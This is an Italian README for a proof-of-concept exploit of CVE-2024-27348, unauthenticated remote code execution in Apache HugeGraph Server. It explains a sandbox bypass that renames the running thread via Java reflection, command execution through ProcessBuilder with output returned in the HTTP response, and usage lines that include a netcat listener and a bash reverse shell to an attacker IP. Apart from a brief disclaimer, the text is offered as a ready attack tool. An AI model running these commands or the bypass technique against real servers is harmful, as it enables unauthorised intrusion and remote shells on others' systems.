
Exploit PoC avanzato per CVE-2024-27348, che ottiene RCE affidabile in Apache HugeGraph tramite bypass della sandbox ed esecuzione di comandi non blind.
Un exploit Proof of Concept (PoC) avanzato e altamente affidabile per CVE-2024-27348 (Esecuzione di Codice Remoto in Apache HugeGraph Server).
A differenza di molti PoC pubblici che eseguono comandi alla cieca o falliscono su payload complessi a causa delle limitazioni di Runtime.exec() di Java, questo script è progettato per affidabilità in scenari di penetration testing reali.
Solo per Scopi Educativi e di Test Autorizzati. Questo strumento è fornito a ricercatori di sicurezza, penetration tester e amministratori di sistema per verificare la vulnerabilità in ambienti autorizzati. L'autore non è responsabile per qualsiasi uso improprio o danno causato da questo strumento.
Questo exploit migliora i primi PoC pubblici affrontando tre problemi critici:
gremlin-server-exec-* o task-worker-*. Questo payload utilizza la Java Reflection per rinominare dinamicamente il thread di esecuzione in BypassThread prima di attivare il payload, eludendo senza problemi il security manager.Runtime.getRuntime().exec(String), che spezza i comandi bash complessi (come le reverse shell) sugli spazi, questo exploit utilizza ProcessBuilder con un List<String> correttamente formattato. Ciò consente l'esecuzione sicura di payload complessi con virgolette e reindirizzamenti.InputStream del processo eseguito utilizzando uno Scanner Java e restituisce l'output effettivo del comando nella risposta HTTP JSON. Vedi esattamente ciò che vede il server.requests libraryInstalla le dipendenze richieste:
pip3 install requests
python3 exploit.py -u <TARGET_URL> -c <COMMAND>
Esempi
python3 exploit.py -u [http://192.168.X.X:80](http://192.168.X.X:80) -c "whoami"
# Sulla tua macchina attaccante, avvia un listener:
nc -lvnp 4444
# Esegui l'exploit:
python3 exploit.py -u [http://192.168.X.X:80](http://192.168.X.X:80) -c "bash -c 'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'"
Apache HugeGraph Server espone un endpoint API Gremlin (/gremlin) che consente agli utenti di inviare script Groovy. A causa di una protezione insufficiente della sandbox nelle versioni precedenti alla patch, un attaccante non autenticato può eseguire comandi arbitrari del sistema operativo tramite Java Reflection.